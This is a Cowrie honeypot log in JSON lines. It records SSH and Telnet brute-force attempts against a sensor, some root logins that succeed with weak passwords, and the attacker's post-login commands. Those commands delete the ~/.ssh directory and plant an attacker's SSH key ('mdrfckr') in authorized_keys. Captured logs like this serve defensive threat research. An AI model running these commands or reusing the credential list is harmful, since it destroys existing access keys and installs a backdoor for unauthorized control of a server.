{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:16:44.206703Z","src_ip":"212.227.235.229","session":"bee9267048eb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:16:44.207502Z","src_ip":"212.227.235.229","session":"bee9267048eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:44.490426Z","src_ip":"212.227.235.229","session":"bee9267048eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:16:45.109389Z","src_ip":"212.227.235.229","session":"bee9267048eb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:16:45.110067Z","src_ip":"212.227.235.229","session":"bee9267048eb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:16:45.393467Z","src_ip":"212.227.235.229","session":"bee9267048eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:45.394398Z","src_ip":"212.227.235.229","session":"bee9267048eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47048,"dst_ip":"1.2.3.4","dst_port":22,"session":"82d605f18b34","protocol":"ssh","message":"New connection: 212.227.235.229:47048 (1.2.3.4:22) [session: 82d605f18b34]","sensor":"my-vps","timestamp":"2025-08-31T06:16:45.662028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:16:45.662976Z","src_ip":"212.227.235.229","session":"82d605f18b34"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:16:45.933161Z","src_ip":"212.227.235.229","session":"82d605f18b34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57338,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbdae0b6c431","protocol":"ssh","message":"New connection: 212.227.235.229:57338 (1.2.3.4:22) [session: bbdae0b6c431]","sensor":"my-vps","timestamp":"2025-08-31T06:16:46.535573Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:16:47.056267Z","src_ip":"212.227.235.229","session":"82d605f18b34"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:16:47.264901Z","src_ip":"212.227.235.229","session":"bbdae0b6c431"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:16:47.265622Z","src_ip":"212.227.235.229","session":"bbdae0b6c431"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:48.329024Z","src_ip":"212.227.235.229","session":"82d605f18b34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47060,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee29f2778c0c","protocol":"ssh","message":"New connection: 212.227.235.229:47060 (1.2.3.4:22) [session: ee29f2778c0c]","sensor":"my-vps","timestamp":"2025-08-31T06:16:48.595783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:16:48.596489Z","src_ip":"212.227.235.229","session":"ee29f2778c0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:16:48.864432Z","src_ip":"212.227.235.229","session":"ee29f2778c0c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:16:49.977332Z","src_ip":"212.227.235.229","session":"ee29f2778c0c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:50.246789Z","src_ip":"212.227.235.229","session":"ee29f2778c0c"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:50.247884Z","src_ip":"212.227.235.229","session":"bee9267048eb"}
{"eventid":"cowrie.login.failed","username":"test4","password":"P@ssw0rd123","message":"login attempt [test4/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:16:53.279940Z","src_ip":"212.227.235.229","session":"bbdae0b6c431"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50758,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb068be2e6cc","protocol":"ssh","message":"New connection: 212.227.125.160:50758 (1.2.3.4:22) [session: eb068be2e6cc]","sensor":"my-vps","timestamp":"2025-08-31T06:16:54.062311Z"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:55.101884Z","src_ip":"212.227.235.229","session":"bbdae0b6c431"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46416,"dst_ip":"1.2.3.4","dst_port":23,"session":"c31af3286070","protocol":"telnet","message":"New connection: 212.227.235.229:46416 (1.2.3.4:23) [session: c31af3286070]","sensor":"my-vps","timestamp":"2025-08-31T06:16:56.766690Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57048,"dst_ip":"1.2.3.4","dst_port":22,"session":"834779183c1e","protocol":"ssh","message":"New connection: 217.72.205.35:57048 (1.2.3.4:22) [session: 834779183c1e]","sensor":"my-vps","timestamp":"2025-08-31T06:17:00.300682Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:17:00.301769Z","src_ip":"217.72.205.35","session":"834779183c1e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:17:00.546253Z","src_ip":"212.227.125.160","session":"eb068be2e6cc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:17:00.644734Z","src_ip":"212.227.125.160","session":"eb068be2e6cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35856,"dst_ip":"1.2.3.4","dst_port":23,"session":"ee0dc67a3305","protocol":"telnet","message":"New connection: 212.227.125.160:35856 (1.2.3.4:23) [session: ee0dc67a3305]","sensor":"my-vps","timestamp":"2025-08-31T06:17:01.235810Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47094,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e997825803b","protocol":"ssh","message":"New connection: 212.227.125.160:47094 (1.2.3.4:22) [session: 2e997825803b]","sensor":"my-vps","timestamp":"2025-08-31T06:17:07.673895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:17:08.077320Z","src_ip":"212.227.125.160","session":"2e997825803b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:17:08.078352Z","src_ip":"212.227.125.160","session":"2e997825803b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51733,"dst_ip":"1.2.3.4","dst_port":22,"session":"95e9cad22c18","protocol":"ssh","message":"New connection: 212.227.235.229:51733 (1.2.3.4:22) [session: 95e9cad22c18]","sensor":"my-vps","timestamp":"2025-08-31T06:17:08.630445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:17:08.632481Z","src_ip":"212.227.235.229","session":"95e9cad22c18"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:17:08.842206Z","src_ip":"212.227.235.229","session":"95e9cad22c18"}
{"eventid":"cowrie.session.closed","duration":12.648069858551025,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:17:09.414694Z","src_ip":"212.227.235.229","session":"c31af3286070"}
{"eventid":"cowrie.login.failed","username":"aa","password":"password","message":"login attempt [aa/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:17:09.680861Z","src_ip":"212.227.235.229","session":"95e9cad22c18"}
{"eventid":"cowrie.login.failed","username":"test4","password":"P@ssw0rd123","message":"login attempt [test4/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:17:09.887213Z","src_ip":"212.227.125.160","session":"2e997825803b"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:17:10.084413Z","src_ip":"212.227.235.229","session":"ed944b24cc8b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:17:10.894952Z","src_ip":"212.227.235.229","session":"95e9cad22c18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37580,"dst_ip":"1.2.3.4","dst_port":22,"session":"db8dc10794bd","protocol":"ssh","message":"New connection: 212.227.235.229:37580 (1.2.3.4:22) [session: db8dc10794bd]","sensor":"my-vps","timestamp":"2025-08-31T06:17:11.546421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:17:11.547546Z","src_ip":"212.227.235.229","session":"db8dc10794bd"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:17:11.607928Z","src_ip":"212.227.125.160","session":"2e997825803b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:17:11.848303Z","src_ip":"212.227.235.229","session":"db8dc10794bd"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer1234!","message":"login attempt [root/Qwer1234!] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:17:13.092607Z","src_ip":"212.227.235.229","session":"db8dc10794bd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:17:14.130454Z","src_ip":"212.227.235.229","session":"db8dc10794bd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:17:14.131260Z","src_ip":"212.227.235.229","session":"db8dc10794bd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:17:14.132181Z","src_ip":"212.227.235.229","session":"db8dc10794bd"}
{"eventid":"cowrie.session.closed","duration":13.016589403152466,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:17:14.252303Z","src_ip":"212.227.125.160","session":"ee0dc67a3305"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:17:14.434430Z","src_ip":"212.227.235.229","session":"db8dc10794bd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:17:15.056751Z","src_ip":"212.227.235.229","session":"db8dc10794bd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:17:15.057591Z","src_ip":"212.227.235.229","session":"db8dc10794bd"}
